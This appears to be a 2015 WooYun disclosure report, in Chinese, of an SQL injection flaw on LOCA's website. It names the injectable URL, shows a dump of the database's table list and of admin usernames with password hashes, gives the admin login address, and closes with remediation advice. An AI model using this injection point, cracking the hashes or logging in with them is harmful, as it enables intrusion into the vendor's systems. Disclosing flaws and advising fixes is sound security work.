漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0112193
漏洞标题:路可loca主站sql注入漏洞
相关厂商:LOCA路可科技
漏洞作者: dkive
提交时间:2015-05-20 17:53
修复时间:2015-07-04 17:54
公开时间:2015-07-04 17:54
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:16
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-04: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
2012年,深圳市佰利彙電子有限公司正式成為LOCA路可科技(香港)有限公司中國區域總代理。LOCA正式進入中國內地市場,推出第一個係列產品--LOCA移動電源,剛一推出就受到市場的熱烈追捧。我們將全情投入,為流動科技創造更多出色的產品
详细说明:
http://www.loca.hk/news.php?id=17
主站任意位置存在sql注入漏洞。
Database: loca
[18 tables]
+-----------------+
| advs |
| corp_info |
| downfile |
| downfilesort |
| en_advs |
| en_corp_info |
| en_downfile |
| en_downfilesort |
| en_news |
| en_product |
| en_product_sort |
| en_system |
| en_video |
| news |
| product |
| product_sort |
| system |
| video |
+-----------------+
Database: loca
Table: system
[2 entries]
+--------+----------+----------------------------------+
| name | username | password |
+--------+----------+----------------------------------+
| system | admin | 188c47daed14593433c4b980a808cf5e |
| system | sky | ec76054fb44c22313138efc0c24f6d28 |
+--------+----------+----------------------------------+
http://www.loca.hk/admin/adminindex.php
后台登陆地址。
漏洞证明:
http://www.loca.hk/news.php?id=17
主站任意位置存在sql注入漏洞。
Database: loca
[18 tables]
+-----------------+
| advs |
| corp_info |
| downfile |
| downfilesort |
| en_advs |
| en_corp_info |
| en_downfile |
| en_downfilesort |
| en_news |
| en_product |
| en_product_sort |
| en_system |
| en_video |
| news |
| product |
| product_sort |
| system |
| video |
+-----------------+
Database: loca
Table: system
[2 entries]
+--------+----------+----------------------------------+
| name | username | password |
+--------+----------+----------------------------------+
| system | admin | 188c47daed14593433c4b980a808cf5e |
| system | sky | ec76054fb44c22313138efc0c24f6d28 |
+--------+----------+----------------------------------+
http://www.loca.hk/admin/adminindex.php
后台登陆地址。
修复方案:
将攻击者可能使用到的特殊字符以及敏感函数进行过滤或使用参数化查询;
尽可能使用复杂的密码,即使攻击者拿到后台密码也难以解密明文密码;
使用专业的网站防火墙,对网站进行防护;
对数据库配置使用最小权限原则,使用低权限数据库用户。
版权声明:转载请注明来源 dkive@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝